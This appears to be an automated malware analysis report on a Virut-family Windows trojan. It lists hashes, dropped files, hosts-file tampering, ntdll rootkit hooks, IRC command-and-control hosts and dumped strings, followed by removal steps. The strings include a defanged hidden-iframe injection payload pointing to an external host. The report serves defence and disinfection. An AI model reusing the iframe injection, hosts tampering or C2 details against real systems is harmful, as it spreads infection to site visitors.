HEUR:Trojan.Win32.Generic (Kaspersky), Win32.Virtob.Gen.12 (AdAware), VirusVirut.YR (Lavasoft MAS)
Behaviour: Trojan, Virus
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: bfbe90b5af26cb1d2920ae9035f52f78
SHA1: 08863ed2cbb6bbc4e31a0fa2e78df4cd10482430
SHA256: ae60f26d097c2885a6c881ee5d8c2cc3013d659d933f2490e01378001af966e9
SSDeep: 1536:3Y8lYfSccCgwWYaziLoF2N2CFLcVyg6hvQNWq0RuaUkbvWYfsBU5V:3CSccsWlXCFLcVygYvajjkLWEsBU5V
Size: 136087 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2004-09-12 12:55:29
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
ntvdm.exe:848
The Trojan injects its code into the following process(es):
%original file name%.exe:644
Mutexes
The following mutexes were created/opened: No objects were found.
File activity
The process ntvdm.exe:848 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsF95B.tmp (335 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsF95C.tmp (269 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsF95B.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsF95C.tmp (0 bytes)
The Trojan creates and/or writes to the following file(s):
C:\bfbe90b5af26cb1d2920ae9035f52f78.usr (24924 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (408872 bytes)
C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (21682 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (444160 bytes)
C:\Windows\USR_Shohdi_Photo_USR.exe (6889123 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.usr (0 bytes)
C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.usr (0 bytes)
Registry activity
Dropped PE files
MD5 | File path |
---|---|
57958bc87e41b7d12acbd2f1d7339339 | c:\bfbe90b5af26cb1d2920ae9035f52f78.usr |
HOSTS file anomalies
The Trojan modifies the "%System%\drivers\etc\hosts" file, which maps host names to IP addresses. The modified file is 864 bytes in size. The following entries are added to the hosts file:
IP | Host name |
---|---|
127.0.0.1 | jL.chura.pl |
127.0.0.1 | validation.sls.microsoft.com |
Rootkit activity
The Trojan installs the following user-mode hooks in ntdll.dll:
NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile
Propagation
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
| | 4096 | 16384 | 6656 | 5.29942 | ed41050c46cf2dea26cf5a8d78627828 |
.rsrc | 20480 | 102400 | 102400 | 2.93276 | acbb54ad74dab65240fe19eea951f628 |
petite | 122880 | 379 | 512 | 2.83683 | d9152af36e3787ad41768ba5d11906da |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 6
b2aab92d99f03af303b25aae13eeb289
a3d3c15c97c2ebb97340bfcedadc7bda
bf16c92476d156ca2f2cc1e9d01ae586
bdb67f83e6289ca4eb53f16c6d9d16e6
bad6dd116684e79855f768b0f3dd4102
a487fa44b39cd08de7c7a2df2d4af69e
Network Activity
URLs
URL | IP |
---|---|
sys.zief.pl | 148.81.111.121 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_644:
`.rsrc
D$(PSSh
ccRegVfy.exe
ccApp.exe
IEXPLORE.EXE
windows
\*.exe
.text
.data
.rsrc
msvcrt.dll
KERNEL32.dll
nddeapir.pdb
_acmdln
m.Zw%
ADVAPI32.DLL
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qoysys.zief.pl
core.ircgalaxy.pl
NICK avabcadz
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 jL.chura.pl
#%26lt;iframe src="hXXp://jL.c%26#104;ura%26#46;pl/rc/" style="width:1px;height:1px"%26gt;%26lt;/iframe%26gt;
KERNEL32.DLL
windowsupdate
drweb
user32.dll
kernel32.dll
MSVCIRT.dll
MSVCRT.dll
5.1.2600.0 (xpclient.010817-1148)
NDDEAPIR.EXE
Windows
Operating System
5.1.2600.0
\BaseNamedObjects\bcrtVt
%original file name%.exe_644_rwx_00401000_00002000:
D$(PSSh
%original file name%.exe_644_rwx_00419000_00005000:
ADVAPI32.DLL
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qoysys.zief.pl
core.ircgalaxy.pl
NICK avabcadz
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 jL.chura.pl
#%26lt;iframe src="hXXp://jL.c%26#104;ura%26#46;pl/rc/" style="width:1px;height:1px"%26gt;%26lt;/iframe%26gt;
KERNEL32.DLL
windowsupdate
drweb
\BaseNamedObjects\bcrtVt
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ntvdm.exe:848
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsF95B.tmp (335 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsF95C.tmp (269 bytes)
C:\bfbe90b5af26cb1d2920ae9035f52f78.usr (24924 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (408872 bytes)
C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (21682 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (444160 bytes)
C:\Windows\USR_Shohdi_Photo_USR.exe (6889123 bytes)
- Restore the original content of the HOSTS file (%System%\drivers\etc\hosts): 127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.